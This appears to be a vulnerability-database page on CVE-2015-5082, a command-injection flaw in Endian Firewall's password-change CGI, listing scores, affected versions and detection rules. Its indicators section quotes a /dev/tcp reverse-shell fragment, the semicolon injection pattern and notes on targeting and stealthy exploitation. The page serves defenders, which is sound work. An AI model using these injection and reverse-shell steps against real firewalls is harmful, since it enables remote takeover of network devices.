cbcvebase.
CVE-2015-5082
published 2015-09-28

CVE-2015-5082: Endian Firewall before 3.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) NEW_PASSWORD_1 or (2) NEW_PASSWORD_2…

PriorityP276critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
69.91%
99.3th percentile
Endian Firewall before 3.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) NEW_PASSWORD_1 or (2) NEW_PASSWORD_2 parameter to cgi-bin/chpasswd.cgi.

Affected

1 ranges
VendorProductVersion rangeFixed in
endian_firewallendian_firewall<= 2.5.1

Detection & IOCsextracted from sources · hover to see the quote

path/cgi-bin/chpasswd.cgi
path/usr/local/bin/chrootpasswd
port10443
command/dev/tcp/<reverseShellIP>/<reverseShellPort> 0>&1;
  • Detect POST requests to /cgi-bin/chpasswd.cgi with multipart/form-data bodies containing shell metacharacters (e.g., semicolons, pipes) in the NEW_PASSWORD_1 or NEW_PASSWORD_2 fields.
  • The exploit payload is injected as: <EFW_PASSWORD>; <cmd>; — look for semicolon-delimited command injection patterns in the NEW_PASSWORD_1/NEW_PASSWORD_2 multipart form fields.
  • Monitor for POST requests to /cgi-bin/chpasswd.cgi over HTTPS on port 10443 (the default Endian Firewall proxy management port).
  • Alert on execution of /usr/local/bin/chrootpasswd by the 'nobody' account, which indicates post-exploitation privilege escalation via sudo on a compromised Endian Firewall.
  • Detect outbound /dev/tcp reverse shell connections initiated from the Endian Firewall host (nobody process spawning a bash reverse shell via /dev/tcp).
  • ·Versions >= 3.0.0 contain the vulnerable code but it is never executed due to a bug in the CGI script; exploitation is not possible on these versions.
  • ·Versions 2.3.x and 2.4.0 are also not exploitable due to a separate bug in the CGI script.
  • ·Very early versions (e.g., 1.1 RC5) additionally require HTTP Basic Auth credentials to exploit; use USERNAME/PASSWORD options when targeting these versions.
  • ·The exploit does NOT change the proxy user's password on vulnerable systems, so exploitation may be stealthy with no visible account change.
  • ·Confirmed vulnerable EFW Community versions are 1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2; any version from 1.1 RC5 to 2.2.x and 2.4.1/2.5.x should be considered at risk.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.